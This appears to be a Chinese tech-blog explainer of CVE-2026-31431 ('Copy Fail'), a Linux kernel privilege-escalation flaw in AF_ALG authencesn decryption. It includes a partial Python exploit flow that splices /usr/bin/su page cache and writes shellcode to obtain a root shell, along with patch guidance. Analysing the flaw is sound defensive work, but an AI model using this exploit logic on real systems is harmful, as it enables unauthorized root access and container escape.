当前位置：首页 > article >正文

漏洞CVE-2026-31431解读

article 2026/5/2 21:13:07

1 介绍名称“Copy Fail”CVE-2026-31431披露时间2026年4月29日类型本地提权漏洞等级高危描述2017年的优化commit 72548b093ee3试图让AEAD加解密操作直接在原地完成以减少内存拷贝。然而在解密路径中系统错误地将来源不同的数据映射当作相同缓冲区处理导致解密时将文件page cache中的页面链接到了可写的目标scatterlist中。authencesn解密在验证认证标签前便向该页面写入4个字节。由此攻击者获得了一个完全可控的、直写文件page cache的4字节写入原语。攻击者通过本地执行简短脚本即可从普通用户权限直接提升至root权限并可能导致容器逃逸、云环境租户隔离被突破等严重后果影响范围2017年以来几乎所有主流Linux发行版2 原理通过splice系统调用将/usr/bin/su文件页缓存映射到AF_ALG缓冲区然后利用authencesn算法解密操作时的 BUG越界写入 shellcode使得运行su命令时以root身份启动bash2.1 文件页缓存Linux内核把磁盘上的文件内容缓存到内存中下次读取就不用再访问慢速磁盘。所有进程读取同一个文件时看到的是同一份内存中的缓存数据。页缓存中的内容如果被修改其他进程立刻能看到修改后的版本2.2 splice系统调用splice() 与 read() 的区别把文件内容发送到网络read磁盘文件-内核页缓存-用户缓冲区-内核Socket缓冲区-网络设备splice磁盘文件-内核页缓存––管道缓冲区––Socket缓冲区-网络设备传递引用并不拷贝数据#includefcntl.hssize_tsplice(intfd_in,loff_t*off_in,intfd_out,loff_t*off_out,size_tlen,unsignedintflags);/* 参数 fd_in 输入文件描述符 off_in 输入偏移量NULL 表示使用当前文件指针 fd_out 输出文件描述符 off_out 输出偏移量 len 传输字节数 flags 控制标志 fd_in 和 fd_out 必须至少有一个是管道 */2.3 /usr/bin/su在 Linux 中进程有两个身份标识RUID 启动这个进程的用户IDEUID进程当前拥有的权限正常情况下RUIDEUIDls-l/usr/bin/su -rwsr-xr-x1root root67832Jan1509:23 /usr/bin/sus即为setuid位设置了 setuid 位且所有者是 root 时RUID启动进程的用户idEUIDroot原因su切换用户时需要读取 /etc/shadow验证用户口令 /etc/shadow只有root拥有读取权限2.4 AF_ALGAF_ALG 是 Linux 内核提供的一个套接字地址族它把内核的加密子系统通过网络套接字接口暴露给用户使用其中的authencesn 是 IPsec 协议中用于支持 64位扩展序列号的一个 AEAD 算法包装器在解密过程中会把序列号的低32位越界写到输出缓冲区末尾之后2.5 流程importos,socket# 创建 AF_ALG 套接字并绑定 authencesn 算法socksocket.socket(socket.AF_ALG,socket.SOCK_SEQPACKET,0)sock.bind((aead,authencesn(hmac(sha256),cbc(aes))))sock.setsockopt(socket.SOL_ALG,socket.ALG_SET_KEY,key)conn,_sock.accept()# 只读打开目标 setuid 文件su_fdos.open(/usr/bin/su,os.O_RDONLY)offsettarget_offset# 将shellcode拆分为多个4字节块注入su中合适的位置forchunkinshellcode_chunks:# AAD[4:8] 要注入的 4 字节aadb\x00*4chunk# splice 文件页缓存引用 → 管道 → AF_ALGpipe_rd,pipe_wros.pipe()os.splice(su_fd,pipe_wr,offset,732)os.splice(pipe_rd,conn.fileno(),0,732)# 触发 authencesn 解密越界写入页缓存conn.sendmsg([aad],[control_msg])conn.recv(1024)os.close(pipe_rd)os.close(pipe_wr)offset4# 执行被篡改的 su获得 root shellos.execve(/usr/bin/su,[su],os.environ)3 复现环境vmwareubuntu24.04首先检查algif_aead是否加载AF_ALG 是套接字接口当一个程序通过 AF_ALG 接口请求使用 AEAD 加密算法时内核就会调用 algif_aead 模块来处理这个请求algif_aead模块已经加载因此存在漏洞在这里下载脚本代码python3执行获得root权限4 修复将内核更新至包含commit a664bf3d603d 的版本sudoaptupdatesudoaptfull-upgrade-y再次执行发现漏洞已经被修复

漏洞CVE-2026-31431解读

相关文章：

漏洞CVE-2026-31431解读

SQL调优全攻略：索引失效定位、EXPLAIN实战与性能跃迁指南

DC/PT隐藏技巧：用set_case_analysis“冻结”信号，让你的综合与STA效率翻倍

SolidWorks装配体配置实战：管理产品变型与方案评审，就靠这一招

从“与或非”门到AI加速：一文捋清FPGA的硬核实力与应用边界

串口不定长接收

大白话说清楚：一句话说透虚拟电厂本质（虚拟电厂的完整闭环）

在taotoken平台管理多个项目api密钥并设置用量告警的策略

SM2数字签名性能暴跌300%？揭秘OpenSSL-Python混合调用下的国密算法瓶颈与4步加速方案

乐高EV3编程入门避坑指南：从软件安装、模块连接到第一个‘Hello World’程序

QNX音频架构QSA实战：从/dev/snd设备文件到多路音频并发处理

权重衰减如何提升大语言模型的可塑性

运维实测神卓K900：异地监控部署，不用技术也能搞定

扩散模型在3D语义部件分解中的应用与优化

AI命令交互前端运行时：流式输出与会话恢复的图形化解决方案

LLM推理优化：最小测试时干预技术解析

告别H2数据库：将Datart数据源迁移到MySQL 5.7的完整配置流程（附配置文件详解）

C++(11)：static_pointer_cast/dynamic_pointer_cast

力扣练习1

终极指南：用NBTExplorer深度掌控Minecraft游戏数据

国家自然科学基金申请书LaTeX工具：5分钟完成专业排版的终极指南

League-Toolkit：英雄联盟客户端全能工具箱终极指南

力扣-1047.删除字符串中的所有相邻重复元素

ap_vld ap_ack ap_hs使用

多语言语义模型实战指南：paraphrase-multilingual-MiniLM-L12-v2如何重塑全球化AI应用

总线接口说明

魔兽争霸3终极优化教程：5分钟解锁高分辨率与高帧率体验

从Simulink模型到实车：手把手搭建你的第一个自动驾驶SIL测试环境（基于MATLAB 2023b）

终极解决方案：让Mac微信消息永久保存，告别撤回烦恼

从源码到实践：手把手拆解FreeRTOS v10.x内核，搞懂任务切换与中断处理的底层逻辑